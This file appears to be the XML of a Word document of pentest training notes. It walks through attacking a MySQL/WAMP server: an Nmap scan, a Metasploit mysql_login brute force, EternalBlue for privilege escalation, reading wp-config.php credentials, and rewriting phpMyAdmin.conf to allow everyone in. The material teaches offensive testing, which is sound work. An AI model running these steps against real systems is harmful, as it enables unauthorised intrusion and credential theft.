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78C2" w14:textId="17275BD3" w:rsidR="00853ABF" w:rsidRPr="000E3A12" w:rsidRDefault="000E3A12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3A12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targeting MySQL Database Server</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3A12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5338D4" w14:textId="77777777" w:rsidR="000E3A12" w:rsidRDefault="000E3A12"/>
    <w:p w14:paraId="35B3C7DB" w14:textId="6832EF43" w:rsidR="000E3A12" w:rsidRPr="000E3A12" w:rsidRDefault="000E3A12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3A12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BAE2B3" w14:textId="77777777" w:rsidR="000E3A12" w:rsidRDefault="000E3A12"/>
    <w:p w14:paraId="1028D8B3" w14:textId="4AC0F7D9" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Nmap -sC -Sv -p 3306,8585 target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29473814" w14:textId="77777777" w:rsidR="000E3A12" w:rsidRDefault="000E3A12"/>
    <w:p w14:paraId="5E6FA2FD" w14:textId="4A885D44" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Searchsploit MYSQL 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1CDB6" w14:textId="77777777" w:rsidR="000E3A12" w:rsidRDefault="000E3A12"/>
    <w:p w14:paraId="37AB2D9C" w14:textId="5E48E7D3" w:rsidR="000E3A12" w:rsidRPr="000E3A12" w:rsidRDefault="000E3A12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3A12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797A22B" w14:textId="77777777" w:rsidR="000E3A12" w:rsidRDefault="000E3A12"/>
    <w:p w14:paraId="5591AA0A" w14:textId="400D17DC" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6AB3D" w14:textId="2B3D2A89" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Search mysql_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B0DE0" w14:textId="376D2384" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Use(index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C578E" w14:textId="21BB6F45" w:rsidR="000E3A12" w:rsidRDefault="000E3A12">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532615FF" w14:textId="3C21DA13" w:rsidR="000E3A12" w:rsidRDefault="00785A52">
      <w:r>
        <w:t>Set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D36F110" w14:textId="68635DF6" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t xml:space="preserve">Set PASS_FILE /usr/share/wordlists/Metasploit/unix_passwords.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B597FE" w14:textId="668722A2" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4D0B3" w14:textId="77777777" w:rsidR="00785A52" w:rsidRDefault="00785A52"/>
    <w:p w14:paraId="20719D9E" w14:textId="5E354C2A" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F8D8D" w14:textId="77777777" w:rsidR="00785A52" w:rsidRDefault="00785A52"/>
    <w:p w14:paraId="525455C1" w14:textId="317737DB" w:rsidR="00785A52" w:rsidRPr="00785A52" w:rsidRDefault="00785A52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00785A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Login to mysql database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E692A" w14:textId="2ECB8689" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t>Mysql -u root -p -h target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C997D6" w14:textId="1D92D547" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t># enter the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A664C" w14:textId="0CACE71A" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t># get the access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC9BEE" w14:textId="77777777" w:rsidR="00785A52" w:rsidRDefault="00785A52"/>
    <w:p w14:paraId="28CFE163" w14:textId="4A066B01" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t>Show databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C233E" w14:textId="36B9C664" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># show databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708565B4" w14:textId="0D7B958F" w:rsidR="00785A52" w:rsidRDefault="00785A52">
      <w:r>
        <w:t># we try to gain access to the website</w:t>
      </w:r>
      <w:r w:rsidR="001E7932">
        <w:t>(drectories which are not accessible from the borwser)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the help of mysql attached to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03613912" w14:textId="77777777" w:rsidR="001E7932" w:rsidRDefault="001E7932"/>
    <w:p w14:paraId="2CCA0A6C" w14:textId="1D4AAA46" w:rsidR="001E7932" w:rsidRPr="001E7932" w:rsidRDefault="001E7932">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another tab</w:t>
      </w:r>
      <w:r w:rsidR="00364152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(msf)</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740004E" w14:textId="05073527" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029558E0" w14:textId="781A88BB" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t xml:space="preserve">Search eternalblue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03077E" w14:textId="7B16091B" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DEA77E" w14:textId="5A32CD44" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4864EE" w14:textId="1C32B2F5" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF8CBB" w14:textId="31572284" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t xml:space="preserve"># get elevated privs on it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BE4A9" w14:textId="3FFF49BF" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t># now we download the phpMyAdmin and edit it and upload the new modify version to allow any one to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DED851" w14:textId="77777777" w:rsidR="001E7932" w:rsidRDefault="001E7932"/>
    <w:p w14:paraId="20254C7D" w14:textId="12B2BD9C" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD23364" w14:textId="62FA26D3" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF1CC6" w14:textId="7E47DF0D" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t xml:space="preserve"># we have to need the certain privs to do this with php on </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC378D9" w14:textId="78F2DCE5" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t xml:space="preserve"># the wmap store the web application and configuration file for them in the c drive folder called </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wamp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC7D0CF" w14:textId="77777777" w:rsidR="001E7932" w:rsidRDefault="001E7932"/>
    <w:p w14:paraId="6534227A" w14:textId="5E3984C2" w:rsidR="001E7932" w:rsidRDefault="001E7932">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F00E9D" w14:textId="68151742" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745ED3E" w14:textId="07ABC552" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD95E0" w14:textId="2369089F" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Cd wamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733E142" w14:textId="21B5E085" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1B5D9" w14:textId="34DCD60D" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t># under apps folders where is the web application alternatively rthey could be under www folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5449C938" w14:textId="1A0041EE" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0D15C" w14:textId="4EC2BD8D" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t># we could have to see the crential by looking at wordpress folder and it’s config file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FEECA7" w14:textId="166F5B0F" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t xml:space="preserve">Cd wordpress </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9DB8FA" w14:textId="01AA76D5" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Cat wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A33F2" w14:textId="7610CEB4" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t># typically contain mysql  user and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33995AF8" w14:textId="77777777" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE"/>
    <w:p w14:paraId="478AFBCF" w14:textId="6FCC75CA" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA63E60" w14:textId="413DD263" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Cd wamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC7A84" w14:textId="51A841DC" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t xml:space="preserve">Cd alisa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B184A16" w14:textId="18A39DF7" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t># to see the phpMyAdmin file .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FFB12" w14:textId="56FDBFC0" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E4B9F" w14:textId="6F53D369" w:rsidR="009B0EDE" w:rsidRDefault="00364152">
      <w:r>
        <w:t>Download phpMyAdmin.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1315A2" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="7669C0CC" w14:textId="4F497545" w:rsidR="00364152" w:rsidRPr="00364152" w:rsidRDefault="00364152">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1F5A2" w14:textId="2A054221" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t xml:space="preserve">Nano </w:t>
      </w:r>
      <w:r>
        <w:t>phpMyAdmin.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3263E168" w14:textId="59645D37" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t># edit it to allow all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD9B88" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="4F9A306B" w14:textId="77777777" w:rsidR="00364152" w:rsidRPr="001E7932" w:rsidRDefault="00364152" w:rsidP="00364152">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(msf)</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7932">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7231A930" w14:textId="763483E8" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t>Upload phpMyAdmin.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8DDC5" w14:textId="5862C956" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t>Cat phpMyAdmin.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAB085D" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="0A571B8F" w14:textId="798F66B0" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t># now try to relad the phpMyAdmin.conf, the reason  is that once you made the changes to that (apache config file), you actually need to restart the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD6B04" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="6721DD4C" w14:textId="242F9801" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t># to restart we need open the cmd of window, stop the wamp acpache and the start it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B494F08" w14:textId="0524C88D" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2539F0" w14:textId="45ED3893" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Net stop wampapache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E96BB" w14:textId="25155ADB" w:rsidR="00364152" w:rsidRDefault="00364152" w:rsidP="00364152">
      <w:r>
        <w:t>Net st</w:t>
      </w:r>
      <w:r>
        <w:t>art</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wampapache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90B577" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="47E953A2" w14:textId="28064820" w:rsidR="00364152" w:rsidRDefault="00364152">
      <w:r>
        <w:t xml:space="preserve">Now reload the phpMyAdmin.conf file and now you get </w:t>
      </w:r>
      <w:r w:rsidR="00ED153C">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A6129" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="558F71C0" w14:textId="4C28E6AB" w:rsidR="00ED153C" w:rsidRDefault="003247F8">
      <w:r>
        <w:t>And see the username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBF0CB" w14:textId="77777777" w:rsidR="00364152" w:rsidRDefault="00364152"/>
    <w:p w14:paraId="104B1C94" w14:textId="5F55392B" w:rsidR="00364152" w:rsidRPr="00364152" w:rsidRDefault="00364152">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07839E" w14:textId="08B6C636" w:rsidR="009B0EDE" w:rsidRPr="00364152" w:rsidRDefault="00364152">
      <w:r w:rsidRPr="00364152">
        <w:t>The configuration file of phpMyAdmin is used to set who can access phpMyAdmin and how.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9002B" w14:textId="77777777" w:rsidR="009B0EDE" w:rsidRDefault="009B0EDE"/>
    <w:p w14:paraId="0FCA8F81" w14:textId="153ED4BD" w:rsidR="001E7932" w:rsidRDefault="00ED153C">
      <w:r>
        <w:t>Wordpress user account under the wordpress user table and see the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6392B" w14:textId="32402B48" w:rsidR="00ED153C" w:rsidRDefault="00ED153C">
      <w:r>
        <w:t>In real pentest not to change the password just document it and show it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A16F1" w14:textId="77777777" w:rsidR="00ED153C" w:rsidRDefault="00ED153C"/>
    <w:p w14:paraId="75CCB9FB" w14:textId="77777777" w:rsidR="0060523A" w:rsidRDefault="0060523A"/>
    <w:p w14:paraId="295BECEB" w14:textId="77777777" w:rsidR="001E7932" w:rsidRDefault="001E7932"/>
    <w:p w14:paraId="03952D41" w14:textId="77777777" w:rsidR="001E7932" w:rsidRDefault="001E7932"/>
    <w:sectPr w:rsidR="001E7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7C"/>
    <w:rsid w:val="000E3A12"/>
    <w:rsid w:val="001E7932"/>
    <w:rsid w:val="003247F8"/>
    <w:rsid w:val="00364152"/>
    <w:rsid w:val="004E4965"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="0060523A"/>
    <w:rsid w:val="006A337C"/>
    <w:rsid w:val="00785A52"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009575CE"/>
    <w:rsid w:val="009B0EDE"/>
    <w:rsid w:val="00E07B4B"/>
    <w:rsid w:val="00ED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13192"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7D94E222-0D1A-4784-AE06-70F94D27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253</Words>
  <Characters>1838</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>131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16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T07:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>